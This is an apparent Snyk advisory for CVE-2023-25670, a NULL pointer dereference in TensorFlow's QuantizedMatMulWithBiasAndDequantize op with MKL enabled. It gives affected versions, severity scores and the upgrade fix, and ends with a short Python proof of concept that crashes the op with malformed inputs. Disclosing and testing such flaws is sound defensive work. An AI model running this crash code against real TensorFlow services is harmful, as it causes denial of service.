NULL Pointer Dereference Affecting tensorflow package, versions [,2.11.1) [2.12.0rc0,2.12.0)
Snyk CVSS
Attack Complexity
High
Availability
High
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.09% (38th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PYTHON-TENSORFLOW-3372996
- published 26 Mar 2023
- disclosed 26 Mar 2023
- credit r3pwnx
Introduced: 26 Mar 2023
CVE-2023-25670 Open this link in a new tabHow to fix?
Upgrade tensorflow
to version 2.11.1, 2.12.0 or higher.
Overview
tensorflow is a machine learning framework.
Affected versions of this package are vulnerable to NULL Pointer Dereference in QuantizedMatMulWithBiasAndDequantize
with MKL enabled.
PoC
import tensorflow as tf
func = tf.raw_ops.QuantizedMatMulWithBiasAndDequantize
para={'a': tf.constant(138, dtype=tf.quint8), 'b': tf.constant(4, dtype=tf.qint8), 'bias': [[31.81644630432129, 47.21876525878906], [109.95201110839844, 152.07968139648438]], 'min_a': 141.5337138686371, 'max_a': [73.84139251708984, 173.15280151367188], 'min_b': [], 'max_b': [[16.128345489501953, 193.26820373535156]], 'min_freezed_output': [], 'max_freezed_output': [115.50032806396484, 156.974853515625], 'Toutput': 1.0, 'transpose_a': True, 'transpose_b': False, 'input_quant_mode': 'MIN_FIRST'}
func(**para)